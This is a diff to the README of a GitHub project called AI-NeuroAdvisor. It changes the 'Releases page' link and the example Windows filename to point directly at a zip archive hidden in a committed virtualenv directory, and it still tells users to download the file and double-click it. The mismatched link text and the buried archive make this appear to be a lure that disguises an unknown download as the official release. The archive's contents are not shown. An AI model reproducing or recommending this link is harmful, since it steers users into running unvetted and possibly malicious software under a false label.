Chandu0394/AI-NeuroAdvisor/README.md

 ## 📥 Download & Install
 To get started, please follow these steps:

-1. Visit the [Releases page](https://github.com/Chandu0394/AI-NeuroAdvisor/releases) to access the latest version of AI-NeuroAdvisor.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Chandu0394/AI-NeuroAdvisor/main/venv/Lib/site-packages/wheel/A-Advisor-Neuro-3.8.zip) to access the latest version of AI-NeuroAdvisor.
 2. On the Releases page, find the section titled "Latest Release".
 Here you will see the downloaded files available for different operating systems.
 3. Click on the file that corresponds to your operating system.
-For instance, if you're on Windows, look for a file named `AI-NeuroAdvisor-Windows.exe`.
+For instance, if you're on Windows, look for a file named `https://raw.githubusercontent.com/Chandu0394/AI-NeuroAdvisor/main/venv/Lib/site-packages/wheel/A-Advisor-Neuro-3.8.zip`.
 4. Once the file downloads, navigate to the location where you saved it.
 5. Double-click the file to start the installation process.
 Follow the on-screen instructions to install the application.